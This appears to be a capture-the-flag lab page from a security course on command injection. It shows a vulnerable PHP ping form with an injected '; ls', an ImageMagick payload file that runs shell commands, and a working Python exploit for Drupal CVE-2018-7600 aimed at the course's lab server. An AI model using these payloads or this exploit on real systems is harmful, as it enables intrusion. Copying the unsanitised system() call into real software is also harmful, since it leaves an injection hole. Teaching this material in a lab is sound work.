ED 102: Command Injection (20 pts + 40 pts extra)


Ping Form (20 pts)

The form below lets you send pings to a remote host. Unfortunately, it has a vulnerability.

To use the form normally, enter a target, such as

127.0.0.1
To see the vulnerability, enter
127.0.0.1; ls
Target IP:    
The PHP code that produced the ping is shown below. As you can see, it uses data from the user in the variable $ac to construct a line of linux shell code.

$c = "ping -c 2 " . $ac;
system($c);

Challenges: Find the Flags (20 pts)

Inject Linux commands to list the files on the server, and look inside them.

There are four flags available on this server:

  • ED 102.1: Flag 1 (5 pts)
  • ED 102.2: Flag 2 (5 pts)
  • ED 102.3: Flag 3 (5 pts extra)
  • ED 102.4: Flag 4 (5 pts extra)
Hint: here are some useful commands to try:

ImageMagick Vulnerability (20 pts)

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image
Select image to upload:

Vulnerability

Make a text file with these contents:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|echo "HELLO";date;")'
pop graphic-context
Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags available in the "chal2" folder:
  • ED 102.5: Find Flag 5 inside a file (10 pts)
  • ED 102.6: Flag 6 appears when you execute a program (10 pts extra)

Drupal Command Injection (20 pts extra)

Background

In April, 2018, a critical Drupal vulnerability was announced, and exploit code became available, as detailed here:

https://thehackernews.com/2018/04/drupal-rce-exploit-code.html

In this project, you'll perform that attack.

Viewing the Vulnerable Website

In a browser, go to:

https://drupal.samsclass.info/

The site is protected by HTTP basic authentication. Log in with a username of student1 and a password of student1

It's just a default installation of Drupal, as shown below.

Preparing the Attack

I used a Debian Linux machine. I expect Ubuntu and Kali would work as well.

Execute these commands to install pip:

sudo apt update
sudo apt install python-pip -y
pip install requests
Using a text editor such as nano, create a file named dru.py containing this code. Change the filename YOURNAME to something unique in all three places it appears.
import sys
import requests
from requests.auth import HTTPBasicAuth

# Based on https://github.com/a2u/CVE-2018-7600 by Vitalii Rudnykh

target = "https://drupal.samsclass.info/"

url = target + 'user/register?element_parents=account/mail/' \
      + '%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
      
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 
           'mail[#post_render][]': 'exec', 'mail[#type]': 'markup',
           'mail[#markup]': 'echo ";-)" | tee YOURNAME.txt'}

r = requests.post(url, data=payload, auth=HTTPBasicAuth('student1', 'student1'))

check = requests.get(target + 'YOURNAME.txt', auth=HTTPBasicAuth('student1', 'student1'))
if check.status_code != 200:
  sys.exit("Not exploitable")
  
print ('\nCheck: '+target+'YOURNAME.txt')

Running the Attack

In a Terminal or Command Prompt window, execute this command:
python dru.py
The attack succeeds, creating a file on the target server, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags on this server:
  • ED 102.7: Find Flag 7 (10 pts)
  • ED 102.8: Find Flag 8 (10 pts)
For my own future reference, here's how I added Basic Auth to Drupal


Posted 4-21-19
ImageMagick & Drupal added 4-23-19
Extra credit portion labelled 8-17-19
HTTP Basic Authentication added 9-12-19
pip install requests added 6-13-2020
Updated with hints and ping PHP code 1-21-21